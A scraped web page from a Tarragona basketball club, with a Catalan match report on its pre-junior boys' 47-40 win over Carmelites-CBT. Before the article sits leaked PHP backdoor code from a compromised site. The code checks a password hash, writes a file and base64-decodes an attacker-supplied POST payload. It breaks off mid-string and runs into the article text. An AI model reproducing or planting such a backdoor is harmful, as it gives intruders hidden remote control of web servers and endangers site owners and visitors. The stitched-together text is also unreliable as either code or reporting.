function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El preinfantil masculí fa una bona sortida i guanya el Carmelites-CBT (47-40) - Tgn Bàsquet Club -

El preinfantil masculí fa una bona sortida i guanya el Carmelites-CBT (47-40)

Updated: març 15, 2016

L’equip preinfantil masculí del TGN Bàsquet va vèncer el Carmelites-CBT en un partit que va anar de més a menys. Així, l’equip que entrena David Artero va sortir molt fort, amb molta intensitat, buscant els un contra un en atac i anotant amb facilitat. D’aquesta manera, els deu primers minuts mostraven un resultat de 22-5 i tot feia pensar que seria un partit plàcid.

Malgrat tot, els locals van deixar de prémer l’accelerador i els visitants es van començar a sentir còmodes. La intensitat lila va desaparèixer i el rebot era cosa del seu adversari. Un parcial de 0-14 a falta de 5 minuts per finalitzar el període, va ajustar el resultat però els locals es van espavilar al final i van vèncer.